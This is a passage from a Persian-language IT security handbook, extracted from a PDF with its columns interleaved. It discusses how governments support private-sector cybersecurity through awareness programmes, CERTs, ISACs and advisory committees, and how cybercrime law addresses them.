ﻣﻬــﻢ ﺩﺭ ﺗﻌﻴــﻴﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﺍﺳــﺖ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﻏﻴﺮ ﺗﻘﻨﻴﻨﻲ ،ﺩﺍﻭﻃﻠﺒﺎﻧﻪ ﻭ ﻣﺒﺘﻨـﻲ ﺑـﺮ
ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﺘﺨﺼﺼﺎﻥ ﺩﻭﻟﺘﻲ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺍﻳﻦ
ﺯﻣﻴﻨﻪ ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ -ﺑﻮﻳﮋﻩ ﺍﮔـﺮ ﺩﻭﻟـﺖ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﺣﻤﺎﻳﺖ ﻛﻨﺪ.
ﺁﮔﺎﻫﻲ ،ﺁﻣﻮﺯﺵ ﻭ ﻇﺮﻓﻴﺖ ﺳﺎﺯﻱ :ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻧﻘﺸﻬﺎﻱ
ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟﺖ ،ﺁﻣﻮﺯﺵ ﻋﻤـﻮﻣﻲ ﻭ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﺑﺨـﺸﻬﺎﻱ
ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﺁﮔـﺎﻫﻲ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ ﻭ
ﺭﻭﺷﻬﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺳﺖ .ﻣﻄﺎﻟﻌﺎﺕ ﻣﻮﺭﺩﻱ ﻭ ﮔﺰﺍﺭﺷﻬﺎﻳﻲ ﻣﺎﻧﻨﺪ
ﺁﻧﭽﻪ ﻛﻪ ﭘﻴﺸﺘﺮ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻧﺪ ،ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺍﻳـﻦ
ﻫﺪﻑ ﻣﻲﺑﺎﺷﻨﺪ .ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺍﺯ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﺧﻮﺍﺳـﺘﻪ ﻛـﻪ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺩﻭﻟﺘﻬﺎ ﺑﺘﺪﺭﻳﺞ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺗﺨـﺎﺫ ﻛﻨﻨـﺪ ﻛـﻪ
ﺑﻄﻮﺭ ﺧﺎﺹ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﻣﺪ ﻧﻈـﺮ
ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﺍﻳﻦ ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷـﺎﻣﻞ ﺗﻄﺒﻴـﻖ ﺳـﺎﻳﺮ ﻗـﻮﺍﻧﻴﻦ
ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺳﺎﺯﮔﺎﺭ ﺷﺪﻥ ﺑـﺎ ﻣـﺴﺎﺋﻞ ﺣـﻮﺯﺓ ﺍﻣﻨﻴـﺖ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﺑﺸﻮﺩ .ﺗﺠﺮﺑﻪ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻛﻪ ﻳـﻚ ﺷـﺮﻁ ﻛﻠﻴـﺪﻱ
ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﻱ ﻣﻮﻓــﻖ ،ﻣﺤــﺪﻭﺩ ﻛــﺮﺩﻥ ﻗــﻮﺍﻧﻴﻦ ﺑــﻪ ﺷــﺮﺍﻳﻂ ﻭ
ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﺧﺎﺹ ﺍﺳﺖ .ﺑﺎ ﺩﺭﻧﻈﺮ ﮔـﺮﻓﺘﻦ ﺍﻳـﻦ ﻧﻜﺘـﻪ ،ﺩﻭﻟﺘﻬـﺎ
ﻭﻇﺎﻳﻒ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﻭﻥ ﻧﮕﺎﻩ ﺧـﺎﺹ ﺑـﻪ ﻓﻨـﺎﻭﺭﻱ ﻳـﺎ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺗﻌﻴﻴﻦ ﻧﻤﻮﺩﻩﺍﻧﺪ .ﺩﺭ ﺍﺭﻭﭘﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺩﺭ ﺭﻫﻨﻤﻮﺩ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩ ٧٠ﺑﺮ ﻋﻬـﺪﺓ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎ ﮔﺬﺍﺷـﺘﻪ
ﺷﺪﻩ ﻭ ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺟـﺰﺀ ﺛـﺎﺑﺘﻲ ﺍﺯ
ﻧﻴﺎﺯﻫﺎﻱ ﺑﺨﺶ ﻣﺎﻟﻲ ﻗﻠﻤﺪﺍﺩ ﻛﺮﺩﻩ ﺍﺳﺖ .ﻃـﻲ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ،
ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ
ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﺻﻨﻌﺖ ﺑﻬﺪﺍﺷـﺖ ﺭﺍ ﺑﻄـﻮﺭ ﺷـﻔﺎﻑ ﺗﻌﺮﻳـﻒ
ﻧﻤﻮﺩﻩﺍﻧﺪ .ﺩﺭ ﺍﺩﺍﻣﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﻄﻮﺭ ﻣﻔﺼﻞ ﺗﺸﺮﻳﺢ ﻣﻲﺷﻮﻧﺪ ،ﺍﻣﺎ
ﺍﺑﺘﺪﺍ ﺑﻪ ﺑﺮﺧﻲ ﻧﻘﺸﻬﺎﻱ ﻣﻬﻢ ﺩﻭﻟﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ
ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﻫﻤﮕﻲ ﻏﻴﺮ ﺍﺯ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻫﺴﺘﻨﺪ.
•
ﺍﻓــﺰﺍﻳﺶ ﺁﮔــﺎﻫﻲ ﺩﺭﺑــﺎﺭﺓ ﺧﻄــﺮﺍﺕ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ،
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎﻱ ﺣﻔﺎﻇﺘﻲ؛
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٤٦
ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻨﺪ ﻛﻪ ﻫﻤﺔ
ﻃﻴﻔﻬــﺎﻱ ﻣﺨــﺎﻃﺒﻴﻦ ﺭﺍ ﺩﺭ ﺑــﺮ ﺑﮕﻴــﺮﺩ .ﺍﺭﺍﺋــﻪ ﮔﺰﺍﺭﺷــﻬﺎ ﻭ
ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺑﻪ ﻣﺠﺎﻣﻊ ﻣﺘﺨﺼﺼﻴﻦ ﺩﺭ ﺍﻓﺰﺍﻳﺶ ﺁﮔـﺎﻫﻲ
ﻣﺆﺛﺮ ﺍﺳﺖ .ﺁﻣﻮﺯﺵ ﻫﻤﭽﻨـﻴﻦ ﺷـﺎﻣﻞ ﺑﻮﺭﺳـﻬﺎﻱ ﺗﺤـﺼﻴﻠﻲ ﻭ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻮﺳﻌﻪﺍﻱ ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺩﺍﻧﺶ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﻧﻴـﺰ
ﻣﻲﺑﺎﺷﺪ .ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﺗﻮﺻﻴﻪ ﻛﺮﺩﻩ ﻛـﻪ
ﺗﻤﺮﻛﺰ ﺑﻴﺸﺘﺮ ﺩﻭﺭﻩﻫﺎ ﺭﺍ ﺑﺮ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ -ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻧﻘـﺸﻬﺎﻱ ﻣﻬـﻢ ﺩﻭﻟـﺖ،
ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺑﺎﺭﺓ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ،
ﺍﺧﻄﺎﺭ ﺩﺭ ﻣﻮﺭﺩ ﻭﻳﺮﻭﺳﻬﺎ ﻭ ﺣﻤـﻼﺕ ﺟﺪﻳـﺪ ،ﺍﺭﺍﺋـﻪ ﭘﻴـﺸﻨﻬﺎﺩﺍﺕ
ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻼﺕ ،ﻭﺻﻠﻪ ﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ٧٢ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ
ﻣﻲﺑﺎﺷﺪ .ﺩﻭﻟﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺩﺟﺔ ﻣﺮﺍﻛﺰ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻧﻈﻴـﺮ
ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ) ٧٣(CERTﻭ ﻣﺮﺍﻛﺰ ﻫﻤﻜـﺎﺭﻱ
ﻛﻪ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﺮﭘﺎ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺗﺄﻣﻴﻦ ﺳﺎﺯﺩ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ
CERTﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ Carnegie Mellon
ﻳﻚ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻖ ﻭ ﺗﻮﺳﻌﺔ ﺩﻭﻟﺘﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺍﺋـﻪ ﻛﻤـﻚ
ﺑﻪ ﺍﺩﺍﺭﺓ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ،ﺍﻧﺘﺸﺎﺭ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ،
ﺗﺤﻘﻴﻖ ﺩﺭﺑﺎﺭﺓ ﺗﻐﻴﻴـﺮﺍﺕ ﺑﻠﻨـﺪﻣـﺪﺕ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺷـﺒﻜﻪﺍﻱ ،ﻭ
ﻫﻤﭽﻨﻴﻦ ﺁﻣـﻮﺯﺵ ﻧﺤـﻮﺓ ﺗﻬﻴـﺔ ﻃﺮﺣﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺗﻲ
ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕـﺮﻱ ﻛـﻪ CERTﺩﺭ
ﺁﻧﻬــﺎ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻋﺒﺎﺭﺗﻨــﺪ ﺍﺯ ﻣــﺎﻟﺰﻱ ،ﮊﺍﭘــﻦ ،ﺍﺳــﺘﺮﺍﻟﻴﺎ ﻭ ﻛــﺮﻩ.
Mcertﻳﻚ ﻣﺮﻛﺰ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ
ﺷﺮﻛﺘﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺩﺭ ﺁﻟﻤﺎﻥ ﺍﺳﺖ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﻣﻴﺎﻥ
ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﻋﻤﻮﻣﻲ ﺭﺍ ﺗﻮﺳﻂ ﺍﻧﺠﻤﻦ BITKOM ICT
ﺁﻟﻤﺎﻥ ،ﻫﻔﺖ ﭘﺸﺘﻴﺒﺎﻥ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺻﻨﻌﺘﻲ ﻭ ﻧﻴﺰ ﺩﻭﻟـﺖ ﺍﻳـﻦ
ﻛﺸﻮﺭ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﺩ.
ﺑﺘﺪﺭﻳﺞ ﺑـﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺑﻬﺘـﺮ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺳـﻄﺢ ﻣﻨﻄﻘـﻪﺍﻱ ﻭ
ﻓﺮﺍﻣﻨﻄﻘﻪﺍﻱ ،ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﭼﻨﺪﻣﻠﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ .ﻛﻤﻴﺴﻴﻮﻥ
ﺍﺭﻭﭘﺎ ﺩﺭ ﮊﻭﺋﻦ ﺳﺎﻝ ۲۰۰۱ﻳـﻚ ﻣﻌﺎﻫـﺪﻩ ﺩﺭ ﺧـﺼﻮﺹ ﺗﻘﻮﻳـﺖ
CERTﺩﺭ ﺍﺭﻭﭘﺎ ﻭ ﻣﺸﺎﺭﻛﺖ ﺑﻬﺘﺮ ﺍﻋـﻀﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺁﻥ ﻣﺮﻛـﺰ
ﻣﻨﺘﺸﺮ ﻛﺮﺩ .ﺩﺭ ﻓﻮﺭﻳﻪ ۲۰۰۳ﺍﻳﻦ ﻛﻤﻴﺴﻴﻮﻥ ﮔﺎﻡ ﻓﺮﺍﺗﺮﻱ ﻧﻬﺎﺩ ﻭ
ﺗــﺼﻤﻴﻢ ﺧــﻮﺩ ﻧــﺴﺒﺖ ﺑــﻪ ﺍﻳﺠــﺎﺩ ﺳــﺎﺯﻣﺎﻥ ﺍﻣﻨﻴــﺖ ﺷــﺒﻜﻪ ﻭ
ﺍﻃﻼﻋــﺎﺕ ٧٤ﺭﺍ ﺍﻋــﻼﻡ ﻧﻤــﻮﺩ APEC .ﺑﻤﻨﻈــﻮﺭ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ
CERTﻣﺤﻠــﻲ ،ﺑــﺮﺍﻱ ﺁﻣــﻮﺯﺵ ﺩﺍﺧﻠــﻲ ﻛــﺸﻮﺭﻫﺎ ﻭ ﺗﻮﺳــﻌﻪ
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳـﻦ ﻣﺮﻛـﺰ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﺔ ﻣﻨﻄﻘـﻪ
Security Patches
Computer Emergency Response Team
Network And Information Security Agency
72
73
74
ﭘﻴﺸﻘﺪﻡ ﺷﺪ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ CERTﺭﺍ ﺗﻬﻴﻪ ﻛﺮﺩ .ﮔـﺮﻭﻩ G8
ﻧﻴﺰ ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﻧﻘﺎﻁ ﺗﻤﺎﺱ ﺩﺍﺋﻤﻲ ﺍﻳﺠﺎﺩ ﻛـﺮﺩ ﺗـﺎ ﻫﻤﻜـﺎﺭﻱ ﻭ
ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗـﺴﻬﻴﻞ ﺷـﻮﺩ؛ ﻭ
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﻭﻟﺘﻬﺎﻱ ﻏﻴﺮ ﻋﻀﻮ ﺩﺭ ﮔﺮﻭﻩ G8ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺩﺭ ﺁﻥ ﻣﺸﺎﺭﻛﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺩﻭﻟﺘﻬﺎﻱ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﺷﻜﺎﻝ
ﻣﺨﺘﻠــﻒ ﺩﺭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﻣﺆﺳــﺴﺎﺗﻲ ﺍﻳﺠــﺎﺩ ﻧﻤﺎﻳــﺪ ﻛــﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﺩﺍﻭﻃﻠﺒﺎﻧﺔ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻛﻨﻨـﺪ؛
ﻫﻤﭽﻮﻥ ﻣﺮﺍﻛﺰ ﺍﺷﺘﺮﺍﻙ ﻭ ﺗﺤﻠﻴﻞ ﺍﻃﻼﻋﺎﺕ ) .٧٥(ISACﺑﻌﻨـﻮﺍﻥ
ﻣﺜﺎﻝ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﺍﻱ ﺑﺨـﺸﻬﺎﻱ ﺧـﺎﺹ ﺻـﻨﻌﺖ )ﻫﻤﭽـﻮﻥ
ﺧﺪﻣﺎﺕ ﺑﺨـﺶ ﻣـﺎﻟﻲ ،ﺑﺨـﺶ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺗﻠﻔﻨـﻲ ﻭ ﺻـﻨﻌﺖ ﻧﻴـﺮﻭﻱ ﺑـﺮﻕ(
ISACﺗﺄﺳﻴﺲ ﻧﻤﻮﺩﻩ ﻭ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻣﺜﻞ ﻛﺎﻧﺎﺩﺍ ،ﺁﻟﻤﺎﻥ ،ﮊﺍﭘﻦ ﻭ
ﻫﻠﻨﺪ ﻧﻴﺰ ﺩﺍﺭﺍﻱ ISACﻣﻲﺑﺎﺷـﻨﺪ .ﺍﻧﮕﻠـﺴﺘﺎﻥ ﺑـﺪﻧﺒﺎﻝ ﻣﻔﻬـﻮﻡ
) ٧٦WARPﻫﺸﺪﺍﺭ ،ﺗﻮﺻﻴﻪ ﻭ ﮔﺰﺍﺭﺵ ﻧﻜﺎﺕ( ﻣﻲﺑﺎﺷﺪ -ﻳﻚ ﺷﺒﻜﻪ
ﺳﺮﺍﺳﺮﻱ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺑﻬﺘﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﺗﻮﺻـﻴﻪﻫـﺎ ﻭ ﻫـﺸﺪﺍﺭﻫﺎﻱ
ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻭ ﻧﻴﺰ ﺩﺭﻳﺎﻓﺖ ﻛﺎﻣﻠﺘﺮ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺣـﻮﺍﺩﺙ
ﺩﺭ ﺁﻥ ﻛﺸﻮﺭ.
ﻫﻤﭽﻨﻴﻦ ﺩﻭﻟﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﺑﻬﺘـﺮ ﺍﻃﻼﻋـﺎﺕ ﺍﻣﻨﻴﺘـﻲ
ﻛﻤﻴﺘﻪ ﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﻋﻤـﻮﻣﻲ ﺍﻳﺠـﺎﺩ ﻛﻨـﺪ .ﺑﻌﻨـﻮﺍﻥ ﻧﻤﻮﻧـﻪ
٧٧
ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﻤﻴﺘﺔ ﻣﺸﺎﻭﺭﺍﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻣﺨـﺎﺑﺮﺍﺕ )(NSTAC
ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﻣﺘـﺸﻜﻞ ﺍﺳـﺖ ﺍﺯ ﺳـﻲ ﻧﻤﺎﻳﻨـﺪﺓ ﻣﻬـﻢ ﺻـﻨﻌﺖ
ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ،ﺷـﺮﻛﺘﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋــﺎﺕ ،ﻭ ﻣﻘﺎﻣــﺎﺕ ﻣــﺴﺌﻮﻝ ﺍﻣﻨﻴــﺖ ﻣﻠــﻲ ﻭ ﺳﻴــﺴﺘﻤﻬﺎﻱ
ﺍﺭﺗﺒـﺎﻃﻲ ﺍﺿـﻄﺮﺍﺭﻱ NSTAC .ﻧﻴـﺰ ﻣـﺸﺎﻭﺭ ﺻـﻨﻌﺘﻲ ﺭﺋــﻴﺲ
ﺟﻤﻬﻮﺭ ﺩﺭ ﺧﺼﻮﺹ ﻣﺸﻜﻼﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﺁﻣـﺎﺩﮔﻲ
ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺍﺳﺖ.
ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ
ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﻛﻪ ﺩﻭﻟﺖ ﺑﺎ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺑﺨـﺶ
ﺧــﺼﻮﺻﻲ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﻛﻨــﺪ "ﻗــﺎﻧﻮﻥ ﺟــﺮﺍﺋﻢ" ﺍﺳــﺖ .ﻣﺆﺳــﺴﺎﺕ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﻣﻨﻄﻘﻪﺍﻱ ﭘﻴﺸﻨﻬﺎﺩ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﻫﺮ ﻛـﺸﻮﺭ ﺑﻌﻨـﻮﺍﻥ
ﺑﺨﺸﻲ ﺍﺯ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﻬﺒﻮﺩ ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ
ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﺨﻠﻔﺎﺗﻲ ﻛﻪ ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ،ﻳـﺎ ﺩﺭ
ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﻣﺨﺪﻭﺵ ﻣـﻲﻛﻨﻨـﺪ ،ﻗـﻮﺍﻧﻴﻦ ﺧـﻮﺩ ﺭﺍ
Information Sharing and Analysis Center
Warning, Advice & Reporting Point
National Security Telecommunication
Advisory Committee
75
76
77
٢٤٧
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺳﺎﺯﮔﺎﺭ ﻧﻤﺎﻳﺪ .ﭼﺎﺭﭼﻮﺏ ﺍﺟﺮﺍﻳﻲ ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ ﻣﺘﺸﻜﻞ ﺍﺯ ﻗﻮﺍﻧﻴﻦ
ﻣﻮﺿﻮﻋﻪ ٧٨ﻭ ﻗﻮﺍﻧﻴﻦ ﺭﻭﺍﻝﻣﻨـﺪ ٧٩ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﻣﻔـﺎﻫﻴﻢ ﺣـﺮﻳﻢ
ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻛﻪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺣﺬﻑ ﻣﻲﻛﻨﻨﺪ ،ﻳﺎ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﻧﻔﻮﺫ ﻛﺮﺩﻩ ﻭ ﺑﺎﻋﺚ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺷـﻮﻧﺪ ،ﻳـﺎ ﺑـﻪ ﻳـﻚ
ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻧﻔــﻮﺫ ﻛــﺮﺩﻩ ﻭ ﺷــﻜﻞ ﻇــﺎﻫﺮﻱ ﺁﻥ ﺭﺍ ﺗﻐﻴﻴــﺮ
ﻣﻲ ﺩﻫﻨﺪ ،ﻫﻤﻪ ﺟـﺰﺀ ﺍﻳـﻦ ﺩﺳـﺘﻪ ﻣﺤـﺴﻮﺏ ﻣـﻲﺷـﻮﻧﺪ.
ﺷﻨﺎﺳﺎﻳﻲ ﻋﻨﺼﺮ "ﻗـﺼﺪ" ﺑـﺮﺍﻱ ﺗﻤـﺎﻳﺰ ﻣﻴـﺎﻥ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ
ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﻭ ﺻﺮﻓﹰﺎ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻣﻌﻤﻮﻝ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﺗﺼﺎﺩﻓﻲ
ﻭﻳﺮﻭﺳﻬﺎ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ.
ﺧﺼﻮﺻﻲ ﻛﻪ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻛﺎﺭﺑﺮﺩ ﺍﺧﺘـﺼﺎﺻﻲ ﺩﺍﺭﺩ ﻭ
